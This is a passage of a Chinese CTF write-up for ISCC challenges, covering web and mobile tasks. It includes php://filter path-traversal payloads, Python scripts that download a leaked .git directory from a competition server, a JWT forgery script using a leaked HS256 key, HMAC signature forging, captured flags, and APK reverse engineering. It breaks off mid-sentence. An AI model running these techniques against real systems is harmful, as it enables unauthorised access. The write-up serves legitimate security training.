        \u8fd9\u4e2a\u65f6\u5019\u5c31\u80fd\u770b\u51fa\u6765\u4e86\uff1adata_uri<\/code> \u6a21\u5f0f\u540e\u9762\u4e0d\u662f\u5355\u7eaf\u5c55\u793a\u6587\u672c\uff0c\u5b83\u8fd8\u4f1a\u628a\u67d0\u4e9b\u5185\u5bb9\u5f53\u6210\u201c\u5f15\u7528\u201d\u53bb\u89e3\u6790\uff0c\u4e5f\u5c31\u662f\u8fd9\u91cc\u5176\u5b9e\u85cf\u4e86\u7b2c\u4e8c\u5957\u903b\u8f91\u3002<\/p>\n\n\n\n
        \u627e\u5b83\u5230\u5e95\u653e\u884c\u4ec0\u4e48\u683c\u5f0f,\u5173\u952e\u5728\u8fd9\u91cc\uff1a<\/p>\n\n\n\n
        \u8fd9\u4e2a\u4f1a\u88ab\u62e6\uff1a<\/p>\n\n\n\n
        php:\/\/filter\/convert.base64-encode\/resource=..\/..\/proc\/self\/root\/secret\/flag\n\n{\"data\":\"data:text\/plain;base64,cGhwOi8vZmlsdGVyL2NvbnZlcnQuYmFzZTY0LWVuY29kZS9yZXNvdXJjZT0uLi8uLi9wcm9jL3NlbGYvcm9vdC9zZWNyZXQvZmxhZw==\",\"preview_type\":\"data_uri\"}<\/code><\/pre>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u8fd9\u4e2a\u80fd\u8fc7\uff1a<\/p>\n\n\n\n
        php:\/\/filter\/convert.base64-encode\/resource=\/secret\/flag\n\n{\"data\":\"data:text\/plain;base64,cGhwOi8vZmlsdGVyL2NvbnZlcnQuYmFzZTY0LWVuY29kZS9yZXNvdXJjZT0vc2VjcmV0L2ZsYWc=\",\"preview_type\":\"data_uri\"}<\/code><\/pre>\n\n\n\n
        \u4e5f\u5c31\u662f\u8bf4\uff1a\u5b83\u4f1a\u62e6\u76f8\u5bf9\u7a7f\u8d8a\u5f62\u5f0f\u7684 resource\uff0c\u4f46\u7edd\u5bf9\u8def\u5f84 \/secret\/flag<\/code> \u88ab\u653e\u884c\u4e86,\u628a\u8fd9\u4e32\u5185\u5bb9\u4f5c\u4e3a data_uri<\/code> \u7684\u6b63\u6587\u63d0\u4ea4\u540e\uff0c\u518d\u53bb\u8bfb\u5bf9\u5e94\u7684\u9884\u89c8\u6587\u4ef6\uff0c\u62ff\u5230\u7684\u662f\u4e00\u6bb5 base64\uff1a<\/p>\n\n\n\n
        \u6ce8\u610f\u5c31\u662f<\/p>\n\n\n\n
        data_uri \u4e0d\u662f\u5355\u7eaf\u843d\u76d8\uff0c\u5b83\u540e\u9762\u8fd8\u6709\u5f15\u7528\u89e3\u6790\n\u5f15\u7528\u89e3\u6790\u5bf9 php:\/\/filter\u505a\u4e86\u534a\u622a\u6821\u9a8c\uff0c\u7ed3\u679c\u628a\u7edd\u5bf9\u8def\u5f84\u653e\u6f0f\u4e86<\/code><\/pre>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u8bbf\u95ee<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        ISCC{BVZmZF6bvmxhKTY42mKh}<\/code><\/pre>\n\n\n\n
        \u591c\u73ed\u5ba1\u8ba1\u53f0<\/h3>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u8bbf\u95ee\u9875\u9762\u53ef\u4ee5\u77e5\u9053\uff0c\u9875\u9762\u660e\u786e\u63d0\u5230\u5ba1\u8ba1\u5458\u8d26\u53f7\uff0c\u8bf4\u660e\u6743\u9650\u6a21\u578b\u91cc\u81f3\u5c11\u6709\u666e\u901a\u7528\u6237\u548c\u5ba1\u8ba1\u5458\u4e24\u79cd\u89d2\u8272\u3002<\/p>\n\n\n\n
        sql\u6ce8\u5165\u5f0f\u5047\u7684<\/p>\n\n\n\n
        \u770b\u654f\u611f\u76ee\u5f55\u53ef\u4ee5\u5f97\u5230\u5b58\u5728 .git \u6cc4\u9732<\/strong><\/p>\n\n\n\n
        http://39.105.213.28:49106\/.git\/HEAD<\/code><\/pre>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        http://39.105.213.28:49106\/.git\/refs\/heads\/master<\/code><\/pre>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u5f97\u5230\u4e00\u4e32 40 \u4f4d\u7684\u5b57\u7b26\u8fd9\u5c31\u662f\u5f53\u524d\u7248\u672c\u7684 Commit\uff08\u63d0\u4ea4\uff09\u5bf9\u8c61 \u7684 ID\u3002<\/p>\n\n\n\n
        Git \u5c06\u6240\u6709\u5185\u5bb9\u5b58\u50a8\u5728 \/.git\/objects\/ \u76ee\u5f55\u4e0b\uff0c\u8def\u5f84\u683c\u5f0f\u4e3a\uff1a\u524d 2 \u4f4d\u5b57\u7b26\/\u540e 38 \u4f4d\u5b57\u7b26\u3002  \n\u4e0b\u8f7d\uff1a\u6839\u636e\u521a\u624d\u62ff\u5230\u7684 SHA-1\uff0c\u8bbf\u95ee \/.git\/objects\/9f\/df9b412e7cfe179e59d28f25f47cffd68484e7<\/code><\/pre>\n\n\n\n
        zlib \u538b\u7f29\u7684\u4e8c\u8fdb\u5236\u6587\u4ef6 \u76f4\u63a5\u8bfb\u53d6\u89e3\u538b<\/p>\n\n\n\n
        exp.py<\/p>\n\n\n\n
        import zlib, urllib.request\nurl = \"http:\/\/39.105.213.28:49106\/.git\/objects\/9f\/df9b412e7cfe179e59d28f25f47cffd68484e7\"\ndata = urllib.request.urlopen(url).read()\nprint(zlib.decompress(data).decode('utf-8', 'replace'))<\/code><\/pre>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        tree \u4ee3\u8868\u5f53\u524d\u6587\u4ef6\u5939\u7ed3\u6784\uff0cparent \u4ee3\u8868\u4e0a\u4e00\u4e2a\u7248\u672c<\/code><\/pre>\n\n\n\n
        \u89e3\u6790 Tree\uff08\u6811\uff09\u5bf9\u8c61\uff1a\u6309\u7167\u540c\u6837\u7684\u529e\u6cd5\uff0c\u4e0b\u8f7d\u5e76\u89e3\u538b tree<\/code> \u5bf9\u5e94\u7684 SHA-1 \u5bf9\u8c61\u3002<\/p>\n\n\n\n
        exp.py<\/p>\n\n\n\n
        import urllib.request\nimport zlib\nimport re\n\nBASE_URL = \"http:\/\/39.105.213.28:49106\/.git\"\n\ndef get_git_object(sha1):\n    path = f\"\/objects\/{sha1[:2]}\/{sha1[2:]}\"\n    try:\n        data = urllib.request.urlopen(BASE_URL + path).read()\n        return zlib.decompress(data)\n    except:\n        return None\n\ndef get_file_sha1(tree_sha1, filename):\n    raw = get_git_object(tree_sha1)\n    if not raw: return None\n    pos = raw.find(filename.encode())\n    if pos != -1:\n        return raw[pos + len(filename) + 1 : pos + len(filename) + 21].hex()\n    return None\n\ndef solve():\n    master_url = f\"{BASE_URL}\/refs\/heads\/master\"\n    curr_commit = urllib.request.urlopen(master_url).read().decode().strip()\n\n    commit_data = get_git_object(curr_commit).decode()\n    curr_tree = re.search(r\"tree ([0-9a-f]{40})\", commit_data).group(1)\n    prev_commit = re.search(r\"parent ([0-9a-f]{40})\", commit_data).group(1)\n\n    curr_blob = get_file_sha1(curr_tree, \"legacy_probe_stub.py\")\n    if curr_blob:\n        print(get_git_object(curr_blob).decode('utf-8', 'ignore'))\n\n    prev_commit_data = get_git_object(prev_commit).decode()\n    prev_tree = re.search(r\"tree ([0-9a-f]{40})\", prev_commit_data).group(1)\n\n    prev_blob = get_file_sha1(prev_tree, \"legacy_probe_stub.py\")\n    if prev_blob:\n        print(get_git_object(prev_blob).decode('utf-8', 'ignore'))\n\nif __name__ == \"__main__\":\n    solve()<\/code><\/pre>\n\n\n\n
        \u5f97\u5230<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        blob 1142# legacy_probe_stub.py\n# compact handover note for the audit platform cut-over\n\nDEFAULT_AUDITOR = (\"auditor\", \"audit2025\")\nINTERNAL_DEV_SECRET = \"ISCC_2026_JWT_DEBUG_KEY_#9527\"\nJWT_ACCEPTED = [\"RS256\", \"HS256\"]\n\ndef decode_ticket(token):\n    \"\"\"\n    current branch:\n      if header.alg == \"RS256\": verify with audit_rsa_pub.pem\n      elif header.alg == \"HS256\": verify with INTERNAL_DEV_SECRET\n    normal login still issues role=user\n    \"\"\"\n    raise NotImplementedError\n\ndef handover():\n    note = []\n    note.append(\"dashboard link to \/auditor\/nodes stays role-gated\")\n    note.append(\"legacy fallback verifier was removed from this revision\")\n    note.append(\"if night shift asks for old sign rule, inspect previous revision\")\n    return note\n\nclass TinyMaze:\n    MAP = [\n        \"#########\",\n        \"#..#....#\",\n        \"#..#.#..#\",\n        \"#....#..#\",\n        \"#########\",\n    ]\n\n    def __init__(self, start=(1, 1)):\n        self.pos = list(start)\n\n    def move(self, dx, dy):\n        x = self.pos[0] + dx\n        y = self.pos[1] + dy\n        if self.MAP[y][x] != \"#\":\n            self.pos = [x, y]\n        return tuple(self.pos)\n\nblob 893# legacy_probe_stub.py\n# old night-shift fallback verifier kept for rollback testing\n\nSERVER_SECRET = \"ISCC_SERVER_SECRET_REAL\"\nLOCAL_ONLY = (\"127.0.0.1\", \"::1\")\nAUDIT_NODE = \"core-storage-01\"\nTIME_WINDOW = 60\n\ndef verify_probe(node_id: str, ts: int, sign: str) -> bool:\n    \"\"\"\n    internal\/audit fallback:\n      msg = f\"{node_id}:{ts}\"\n      expected = HMAC_SHA256_hex(SERVER_SECRET, msg)\n      abs(now-ts) <= 60\n      remote_addr in LOCAL_ONLY\n    \"\"\"\n    raise NotImplementedError\n\nclass PixelRunner:\n    def __init__(self):\n        self.energy = 3\n        self.score = 0\n\n    def tick(self, move: str):\n        if move in {\"left\", \"right\", \"jump\"}:\n            self.score += 1\n            self.energy = max(0, self.energy - 1)\n        return self.score, self.energy\n\ndef demo_loop(script):\n    game = PixelRunner()\n    for move in script:\n        game.tick(move)\n    return game.score<\/code><\/pre>\n\n\n\n
        \u7b2c\u4e00\u6bb5legacy_probe_stub.py\u53ef\u4ee5\u5f97\u5230\u4fe1\u606f<\/p>\n\n\n\n
        \u9ed8\u8ba4\u8d26\u53f7\uff1a<\/p>\n\n\n\n
        \u670d\u52a1\u7aef\u63a5\u53d7\u4e24\u79cd JWT \u7b97\u6cd5\uff1aDEFAULT_AUDITOR = (\"auditor\", \"audit2025\")\n\u8bf4\u660e\u767b\u5f55\u9875\u53ef\u4ee5\u5148\u5c1d\u8bd5\u8fd9\u7ec4\u53e3\u4ee4\u3002\nJWT \u8c03\u8bd5\u5bc6\u94a5\uff1aINTERNAL_DEV_SECRET = \"ISCC_2026_JWT_DEBUG_KEY_#9527\"\n\u8bf4\u660e\u5f00\u53d1\u73af\u5883\/\u8c03\u8bd5\u73af\u5883\u4e2d\uff0cHS256 \u4f1a\u4f7f\u7528\u8fd9\u4e2a\u5bf9\u79f0\u5bc6\u94a5\u3002\n\u670d\u52a1\u7aef\u63a5\u53d7\u4e24\u79cd JWT \u7b97\u6cd5\uff1aJWT_ACCEPTED = [\"RS256\", \"HS256\"]\n\nif header.alg == \"RS256\": verify with audit_rsa_pub.pem\nelif header.alg == \"HS256\": verify with INTERNAL_DEV_SECRET\nnormal login still issues role=user\n\u8fd9\u91cc\u8bf4\u660e\u6b63\u5e38\u767b\u5f55\u7b7e\u53d1\u7684\u7968\u636e\u867d\u7136\u53ef\u80fd\u662f\u5408\u6cd5\u7684\uff0c\u4f46\u89d2\u8272\u4ecd\u7136\u662f user\uff1b\u5982\u679c\u670d\u52a1\u7aef\u5728\u6821\u9a8c\u65f6\u5141\u8bb8 HS256\uff0c\u800c\u6211\u4eec\u53c8\u5df2\u7ecf\u77e5\u9053\u4e86 INTERNAL_DEV_SECRET\uff0c\u90a3\u5c31\u53ef\u4ee5\u4f2a\u9020\u4e00\u4e2a role=auditor \u7684 JWT\u3002\n\n\u63d0\u793a\nnote.append(\"if night shift asks for old sign rule, inspect previous revision\")\n\u65e7\u7248\u672c\u91cc\u8fd8\u6709\u4e0b\u4e00\u9636\u6bb5\u7684\u7b7e\u540d\u89c4\u5219\uff0c\u7ee7\u7eed\u7ffb\u5386\u53f2\u3002<\/code><\/pre>\n\n\n\n
        \u7b2c\u4e8c\u6bb5legacy_probe_stub.py\u5219\u76f4\u63a5\u7ed9\u51fa\u4e86\u7b2c\u4e8c\u9636\u6bb5\u5185\u90e8\u63a5\u53e3\u7684\u7b7e\u540d\u89c4\u5219\uff1a<\/p>\n\n\n\n
        \u670d\u52a1\u5668\u7aef\u5185\u90e8\u7b7e\u540d\u5bc6\u94a5\uff1aSERVER_SECRET = \"ISCC_SERVER_SECRET_REAL\"\n\u9ed8\u8ba4\u8282\u70b9\u540d\uff1aAUDIT_NODE = \"core-storage-01\"\n\u7b7e\u540d\u683c\u5f0f\uff1amsg = f\"{node_id}:{ts}\"\nexpected = HMAC_SHA256_hex(SERVER_SECRET, msg)\n\u65f6\u95f4\u7a97\u53e3\uff1aabs(now-ts) <= 60\n\u53ea\u5141\u8bb8\u672c\u5730\u8bbf\u95ee\uff1aremote_addr in LOCAL_ONLY<\/code><\/pre>\n\n\n\n
        \u8fd9\u91cc\u7684\u201c\u53ea\u5141\u8bb8\u672c\u5730\u8bbf\u95ee\u201d\u5e76\u4e0d\u610f\u5473\u7740\u6211\u4eec\u4e00\u5b9a\u4e0d\u80fd\u5229\u7528\uff0c\u56e0\u4e3a\u524d\u7aef\u9875\u9762\u5f88\u53ef\u80fd\u662f\u201c\u670d\u52a1\u7aef\u4ee3\u8bf7\u6c42\u5185\u90e8\u63a5\u53e3\u201d\u3002\u4e5f\u5c31\u662f\u8bf4\uff0c\u6211\u4eec\u8bbf\u95ee\u516c\u5f00\u9875\u9762 \/auditor\/nodes<\/code>\uff0c\u7531\u670d\u52a1\u7aef\u5728\u540e\u7aef\u66ff\u6211\u4eec\u8bf7\u6c42\u5185\u90e8\u63a5\u53e3\uff0c\u8fd9\u6837\u5185\u90e8\u63a5\u53e3\u770b\u5230\u7684\u6765\u6e90\u5730\u5740\u4ecd\u7136\u53ef\u80fd\u662f 127.0.0.1<\/code>\u3002<\/p>\n\n\n\n
        \u5b8c\u6574\u5229\u7528\u94fe\uff1a<\/p>\n\n\n\n
        \u5229\u7528\u5f53\u524d\u7248\u672c\u6e90\u7801\u62ff\u5230 JWT \u4f2a\u9020\u6761\u4ef6\uff0c\u4f2a\u9020\u5ba1\u8ba1\u5458\u8eab\u4efd\u8fdb\u5165\u66f4\u9ad8\u6743\u9650\u9875\u9762\uff0c\u5728\u65e7\u7248\u672c\u6e90\u7801\u91cc\u62ff\u5230\u5185\u90e8\u63a5\u53e3\u7b7e\u540d\u7b97\u6cd5\u548c\u5bc6\u94a5\u6784\u9020\u5408\u6cd5\u7b7e\u540d\uff0c\u8ba9\u670d\u52a1\u7aef\u4ee3\u67e5\u5185\u90e8\u8282\u70b9\u72b6\u6001\uff0c\u8fd4\u56de flag<\/code><\/pre>\n\n\n\n
        \u5148\u767b\u5f55<\/p>\n\n\n\n
        auditor\/audit2025<\/code><\/pre>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u53ef\u4ee5\u770b\u51fa\u670d\u52a1\u5668\u6b63\u5e38\u7b7e\u53d1\u7684\u662f\u4e00\u4e2a JWT\uff0c\u5e76\u4e14 alg<\/code> \u662f RS256<\/code>\u3002<\/p>\n\n\n\n
        \u6784\u9020\u4f2a\u9020\u7684 JWT \u5ba1\u8ba1\u5458\u7968\u636e<\/p>\n\n\n\n
        \u670d\u52a1\u7aef\u63a5\u53d7 RS256 \u548c HS256\u4e24\u79cd\u7b97\u6cd5\nHS256 \u4f7f\u7528\u4e86\u5df2\u7ecf\u6cc4\u9732\u7684\u5bf9\u79f0\u5bc6\u94a5 INTERNAL_DEV_SECRET\nJWT \u7684 payload \u4e2d\u76f4\u63a5\u5305\u542b\u89d2\u8272\u5b57\u6bb5 role\n\u670d\u52a1\u7aef\u53ea\u8981\u9a8c\u7b7e\u901a\u8fc7\uff0c\u5c31\u4f1a\u4fe1\u4efb\u5176\u4e2d\u7684 role\n\u56e0\u6b64\uff0c\u6211\u4eec\u53ef\u4ee5\u81ea\u5df1\u6784\u9020\uff1a\n- sub = auditor\n- role = auditor\n- alg = HS256\n\u7136\u540e\u4f7f\u7528\u6cc4\u9732\u5bc6\u94a5\u7b7e\u540d\uff0c\u5f97\u5230\u4e00\u4e2a\u5408\u6cd5\u7684\u9ad8\u6743\u9650 token\u3002<\/code><\/pre>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhdWRpdG9yIiwicm9sZSI6ImF1ZGl0b3IiLCJpYXQiOjE3NzgwNjc4NDEsImV4cCI6MTc3ODA5NjY0MSwiaXNzIjoi5aSc54-t5a6h6K6h5Y-wIn0.zeD6yMkIOkijnA5T-_Q29le0B63iELU-i7R8oJykqjA<\/code><\/pre>\n\n\n\n
        \u811a\u672c\u4e5f\u884c<\/p>\n\n\n\n
        import base64\nimport hmac\nimport hashlib\nimport json\nimport time\n\nsecret = 'ISCC_2026_JWT_DEBUG_KEY_#9527'\n\nheader = {\n    'alg': 'HS256',\n    'typ': 'JWT'\n}\n\npayload = {\n    'sub': 'auditor',\n    'role': 'auditor',\n    'iat': int(time.time()),\n    'exp': int(time.time()) + 1800,\n    'iss': '\u591c\u73ed\u5ba1\u8ba1\u53f0'\n}\n\ndef b64(obj):\n    raw = json.dumps(obj, separators=(',', ':'), ensure_ascii=False).encode()\n    return base64.urlsafe_b64encode(raw).rstrip(b'=')\n\nmsg = b'.'.join([b64(header), b64(payload)])\nsig = base64.urlsafe_b64encode(\n    hmac.new(secret.encode(), msg, hashlib.sha256).digest()\n).rstrip(b'=')\n\ntoken = (msg + b'.' + sig).decode()\nprint(token)<\/code><\/pre>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u4fee\u6539\u5305\u5c31\u884c\u53d1\u5305\u548c\u8fd4\u56de\u5305\u90fd\u6539<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u6210\u529f\u8fdb\u5165<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u9875\u9762\u4f1a\u5c55\u793a\u4e00\u4e2a\u67e5\u8be2\u8868\u5355\uff0c\u5b57\u6bb5\u6709\uff1a<\/p>\n\n\n\n
        node_id\uff0cts \uff0csign\u9875\u9762\u63d0\u793a\u5982\u4e0b\uff1a<\/p>\n\n\n\n
        \u672c\u9875\u9762\u4f1a\u4ee3\u4f60\u5411\u5185\u90e8\u5ba1\u8ba1\u8fdb\u7a0b\u53d1\u8d77\u8bf7\u6c42\uff0c\u67e5\u8be2\u6307\u5b9a\u8282\u70b9\u7684\u72b6\u6001\u3002\n\u5185\u90e8\u63a5\u53e3\u53ea\u63a5\u53d7\u5e26\u7b7e\u540d\u7684\u8bf7\u6c42\uff0c\u7b7e\u540d\u57fa\u4e8e node_id \u548c timestamp \u8ba1\u7b97\uff0c\u5e76\u8bbe\u5b9a\u4e86\u4e25\u683c\u7684\u65f6\u95f4\u7a97\u53e3\u3002<\/code><\/pre>\n\n\n\n
        \u9a8c\u8bc1\u4e86\u524d\u9762\u5bf9\u65e7\u7248\u6e90\u7801\u7684\u63a8\u65ad\uff1a<\/p>\n\n\n\n
        \u8fd9\u4e2a\u9875\u9762\u5e76\u4e0d\u662f\u76f4\u63a5\u628a\u6570\u636e\u653e\u5728\u524d\u7aef\uff0c\u5b83\u4f1a\u7531\u670d\u52a1\u7aef\u201c\u4ee3\u4f60\u201d\u8bf7\u6c42\u5185\u90e8\u63a5\u53e3\uff0c\u6240\u4ee5\u65e7\u7248\u4ee3\u7801\u91cc\u7684 LOCAL_ONLY \u9650\u5236\u4e0d\u4f1a\u5361\u6b7b\u6211\u4eec\uff0c\u6211\u4eec\u53ea\u8981\u63d0\u4f9b\u6b63\u786e\u7684 node_id\u3001ts\u3001sign \u5373\u53ef<\/code><\/pre>\n\n\n\n
        \u524d\u9762\u5df2\u7ecf\u660e\u786e\u8bf4\u660e\u7b7e\u540d\u8ba1\u7b97\u65b9\u5f0f<\/p>\n\n\n\n
        msg = f\"{node_id}:{ts}\"\nexpected = HMAC_SHA256_hex(SERVER_SECRET, msg)<\/code><\/pre>\n\n\n\n
        \u7ed9\u51fa\u4e86<\/p>\n\n\n\n
        SERVER_SECRET = \"ISCC_SERVER_SECRET_REAL\"\nAUDIT_NODE = \"core-storage-01\"\nTIME_WINDOW = 60<\/code><\/pre>\n\n\n\n
        \u4f7f\u7528\u9898\u76ee\u7ed9\u51fa\u7684\u9ed8\u8ba4\u8282\u70b9\u540d core-storage-01\n\u4f7f\u7528\u5f53\u524d\u65f6\u95f4\u6233\uff0c\u786e\u4fdd\u843d\u5728 60 \u79d2\u7a97\u53e3\u5185\n\u7528 HMAC-SHA256 \u8ba1\u7b97\u5341\u516d\u8fdb\u5236\u7b7e\u540d<\/code><\/pre>\n\n\n\n
        exp.py<\/p>\n\n\n\n
        import time\nimport hmac\nimport hashlib\n\nnode = 'core-storage-01'\nts = str(int(time.time()))\nsecret = b'ISCC_SERVER_SECRET_REAL'\n\nmsg = f'{node}:{ts}'.encode()\nsign = hmac.new(secret, msg, hashlib.sha256).hexdigest()\n\nprint('ts =', ts)\nprint('sign =', sign)<\/code><\/pre>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        ts = 1778068856\nsign = e541a9176c9bdebe9b74c7cdcf27824b130635007eebc9d33f352f225e83e4c7<\/code><\/pre>\n\n\n\n
        \u9700\u8981\u5feb\u4e00\u70b9\u586b\u5199<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        ISCC{dcDEwhPp5cQU86X757Vr}<\/code><\/pre>\n\n\n\n
        MOBILE<\/h2>\n\n\n\n
        \u4ee3\u53f7\uff1a\u6697\u7bb1\u89e3\u5bc6\u884c\u52a8<\/h3>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        apk\u53cd\u7f16\u8bd1\u770bcom.example.scm.ctf.PasswordValidator<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u5206\u6790 validateAndDecrypt<\/code> \u51fd\u6570\uff1a<\/strong><\/p>\n\n\n\n
        \u8fd9\u662f\u4e3b\u8981\u7684\u6821\u9a8c\u5165\u53e3\u3002\u4ee3\u7801\u8981\u6c42\u8f93\u5165 4 \u6bb5\u5b57\u7b26\u4e32\uff1ap1<\/code>, p2<\/code>, p3<\/code>, p4<\/code>\u3002<\/p>\n\n\n\n
        \u9996\u5148\u662f\u5bf9 p1<\/code> \u548c p2<\/code> \u7684\u6821\u9a8c\uff08\u5728 Java \u5c42\u660e\u6587\u8fdb\u884c\uff09\uff1a<\/p>\n\n\n\n
        p1<\/p>\n\n\n\n
        byte[] h1 = Transforms.INSTANCE.doubleSha256Ascii6(pp1);\nString h1hex = ... \/\/ \u8f6c\u5341\u516d\u8fdb\u5236\u5e76\u8f6c\u5927\u5199\nif (!Intrinsics.areEqual(h1hex, \"5475D82A7B1E7BAD1C0D50487C52AD17D8C7E5F1FF68E361ACC725CD301A5215\"))<\/code><\/pre>\n\n\n\n
        p1 \u5fc5\u987b\u662f 6 \u4f4d ASCII \u5b57\u7b26\uff0c\u4e14\u5176 SHA256(SHA256(p1))<\/code> \u7684\u7ed3\u679c\u5fc5\u987b\u7b49\u4e8e\u7ed9\u5b9a\u7684\u54c8\u5e0c\u503c\u3002\u56e0\u4e3a p1<\/code> \u53ea\u6709 6 \u4f4d\u5b57\u7b26\uff0c\u641c\u7d22\u7a7a\u95f4\u6781\u5c0f\uff0895^6\uff09\uff0c\u5b8c\u5168\u53ef\u4ee5\u76f4\u63a5\u7206\u7834\u3002<\/p>\n\n\n\n
        p2<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u53ea\u8981\u7206\u7834\u51fa p1<\/code>\uff0c\u6211\u4eec\u5c31\u80fd\u7b97\u51fa u1<\/code>\u3002\u987a\u7740\u4ee3\u7801\u628a\u8fd9\u4e9b\u53d8\u6362\u9006\u63a8\u56de\u53bb\uff0c\u5c31\u80fd\u7b97\u51fa\u76ee\u6807 u2<\/code>\u3002\u4e00\u65e6\u7b97\u51fa\u76ee\u6807 u2<\/code>\uff0c\u518d\u6b21\u904d\u5386 6 \u4f4d\u5b57\u7b26\u4e32\u8fdb\u884c foldAscii6ToU24<\/code> \u54c8\u5e0c\u78b0\u649e\uff0c\u5c31\u80fd\u7206\u7834\u51fa p2<\/code>\u3002<\/p>\n\n\n\n
        p1<\/code> \u548c p2<\/code> \u7684\u6c42\u6cd5\u5c31\u77e5\u9053\u4e86<\/p>\n\n\n\n
        \u7ee7\u7eed\u770b Java \u4ee3\u7801\uff0c\u6821\u9a8c\u4ea4\u7ed9\u4e86 NativeBridge\uff1a\u89e3\u538b APK\uff0c\u63d0\u53d6\u51fa lib\/arm64-v8a\/libscm_native.so<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u5206\u6790 validatePart4(sub_21424 )<\/p>\n\n\n\n
        \u6211\u4eec\u53d1\u73b0\u8fd9\u662f\u4e00\u4e2a\u52a8\u6001\u53d8\u5f02\u7684 Base64 \u7f16\u7801\u5668\uff1a\n\u5b83\u9996\u5148\u57fa\u4e8e p1\u3001p2\u3001p3 \u7684\u54c8\u5e0c\u503c\u6df7\u5408\u51fa\u4e00\u4e2a\u504f\u79fb\u91cf\uff08v20 & 0x3F\uff09\u3002\n\u4f7f\u7528\u8fd9\u4e2a\u504f\u79fb\u91cf\u5bf9\u6807\u51c6\u7684 Base64 \u5b57\u5178\uff08\u5b58\u5728 .so \u91cc\uff0c\u5730\u5740\u5728 0x55300 \u9644\u8fd1\uff09\u8fdb\u884c\u51ef\u6492\u79fb\u4f4d\uff0c\u751f\u6210\u4e00\u4e2a\u52a8\u6001\u5b57\u5178\u3002\n\u5c06\u8f93\u5165\u7684 6 \u5b57\u8282 p4 \u6309\u7167 Base64 \u89c4\u5219\u5207\u5206\u6210 8 \u4e2a 6-bit \u5757\u3002\n\u6bcf\u4e2a 6-bit \u5757\u5148\u4e0e\u4e00\u4e2a\u52a8\u6001\u5bc6\u94a5\uff08\u901a\u8fc7\u79fb\u4f4d v20 \u5f97\u5230\uff09\u5f02\u6216\uff0c\u518d\u7528\u65b0\u5b57\u5178\u67e5\u8868\u3002\n\u6700\u7ec8\u751f\u6210\u7684 8 \u5b57\u8282\u5fc5\u987b\u4e0e .so \u4e2d\u7684\u786c\u7f16\u7801\u6570\u7ec4\uff08byte_552D0 \u548c dword_552D8 \u6df7\u5408\u5f97\u5230\uff09\u5b8c\u5168\u4e00\u81f4\u3002<\/code><\/pre>\n\n\n\n
        Base64 \u5b57\u5178<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u53cd\u5411\u67e5\u8868<\/p>\n\n\n\n
        \u62ff\u7740\u8fd9 8 \u4e2a\u5b57\u8282\u53bb\u52a8\u6001\u5b57\u5178\u91cc\u53cd\u67e5\u51fa\u7d22\u5f15\u3002\n\u64a4\u9500\u5f02\u6216\u64cd\u4f5c\u3002\n\u5c06 8 \u4e2a 6-bit \u5757\u91cd\u65b0\u62fc\u56de 6 \u5b57\u8282\u660e\u6587\u3002\n\u5982\u679c\u5728\u6574\u4e2a 24-bit \u7a7a\u95f4\u4e2d\u904d\u5386\u90a3\u4e2a\u672a\u77e5\u7684\u53c2\u6570\uff08v20\uff09\uff0c\u53ea\u8981\u62fc\u51fa\u6765\u7684 p4 \u5168\u662f\u53ef\u6253\u5370\u5b57\u7b26\uff0c\u5b83\u5c31\u662f\u5019\u9009\u7b54\u6848\u3002<\/code><\/pre>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u6211\u4eec\u77e5\u9053 validatePart3 \u80af\u5b9a\u6821\u9a8c\u4e86 p3\uff0c\u4f46\u903b\u8f91\u53ef\u80fd\u5f88\u590d\u6742\uff08\u6d89\u53ca\u8bfb\u6587\u4ef6\u7b49\uff09\u3002\u4f46\u6b64\u65f6\u6211\u4eec\u624b\u91cc\u6709\u4e00\u5f20\u201c\u5e95\u724c\u201d\u2014\u2014\u6700\u7ec8\u89e3\u5bc6 flag \u7684\u51fd\u6570 nativeDecryptFlag\u3002\n\u9006\u5411\u53d1\u73b0\uff0c\u5b83\u4f7f\u7528 p1+p2+p3+p4 \u7684\u6574\u4f53 SHA-256 \u503c\u53bb\u5bf9\u6bd4\u4e00\u4e2a 32 \u5b57\u8282\u7684\u5e38\u91cf\uff08EXPECTED_SHA256\uff0c\u4f4d\u4e8e 0x552DC\uff09\u3002\n\u65e2\u7136\u6211\u4eec\u80fd\u79d2\u51fa\u51e0\u5341\u4e2a\u5408\u6cd5\u7684 p4 \u5019\u9009\uff0c\u6211\u4eec\u53ef\u4ee5\u76f4\u63a5\u5ffd\u7565\u590d\u6742\u7684 Part3 \u6821\u9a8c\uff1a\n\u751f\u6210\u968f\u673a\uff08\u6216\u6309\u89c4\u5f8b\uff09\u7684 p3 